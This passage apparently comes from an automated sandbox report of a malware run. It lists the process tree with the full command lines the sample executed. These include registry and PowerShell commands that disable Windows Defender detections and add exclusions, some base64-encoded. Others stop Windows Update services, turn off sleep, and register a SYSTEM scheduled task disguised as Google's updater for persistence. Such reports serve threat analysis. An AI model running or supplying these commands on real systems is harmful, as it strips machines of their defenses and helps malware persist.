/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6860
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8768
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:9136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8788
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BMqwPTrKyumU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BMqwPTrKyumU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PqJnqsLJcreLKEzFxwR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PqJnqsLJcreLKEzFxwR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYmVIfGDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYmVIfGDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bWWVzdGiQOJQC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bWWVzdGiQOJQC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dfsAhZAXuTUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dfsAhZAXuTUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nSOiWxomDebhDYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nSOiWxomDebhDYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\eZhrXZyeByuTGuVH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\eZhrXZyeByuTGuVH\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:8600
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMqwPTrKyumU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9132
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMqwPTrKyumU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:9688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BMqwPTrKyumU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqJnqsLJcreLKEzFxwR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqJnqsLJcreLKEzFxwR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYmVIfGDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYmVIfGDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bWWVzdGiQOJQC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bWWVzdGiQOJQC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dfsAhZAXuTUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dfsAhZAXuTUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nSOiWxomDebhDYVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nSOiWxomDebhDYVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qABqRMnwOGPxNrwvr /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5700
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\SysWOW64\rundll32.exe"
  2⤵
  PID:9848

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7340
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:8872
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8604
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8464
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:7620
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:7096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3F24.bat" "
1⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\7846.exe
C:\Users\Admin\AppData\Local\Temp\7846.exe
1⤵
PID:7516

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
1⤵
PID:8500

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
1⤵
PID:8656
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
  2⤵
  PID:3636

C:\Users\Admin\AppData\Local\Temp\8F59.exe
C:\Users\Admin\AppData\Local\Temp\8F59.exe
1⤵
PID:8696

C:\Users\Admin\AppData\Local\Temp\9BED.exe
C:\Users\Admin\AppData\Local\Temp\9BED.exe
1⤵
PID:7404

C:\Users\Admin\AppData\Local\Temp\AAE2.exe
C:\Users\Admin\AppData\Local\Temp\AAE2.exe
1⤵
PID:7280

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7816
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:8988
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:8676
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5820
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:7684
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:3668

C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\callcustomerpro.exe
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\callcustomerpro.exe
1⤵
PID:2736
- C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\callcustomer.exe
  C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\callcustomer.exe
  2⤵
  PID:8336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:8632

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8952
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:6884
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:5632
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:6220
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8584

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8916

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6368
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:8504
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:9120
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:6920
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1936

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:204

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:1892

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
1⤵
- Creates scheduled task(s)
PID:6440

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8604

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:8492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2884

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a1bff035a77e4d4fad3e30f3c39ec752 /t 4216 /p 8604
1⤵
PID:9192

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\dc88d9e0fba4428c8fd26f99154b9816 /t 6180 /p 8584
1⤵
PID:6220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7292

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:8396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4592

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:8860
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4740
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4356
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2972
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:1112
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:1864

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\285C.exe
C:\Users\Admin\AppData\Local\Temp\285C.exe
1⤵
PID:8488
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8488 -s 780
  2⤵
  - Program crash
  PID:1112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4748

C:\Users\Admin\AppData\Local\Temp\33F5.exe
C:\Users\Admin\AppData\Local\Temp\33F5.exe
1⤵
PID:3440

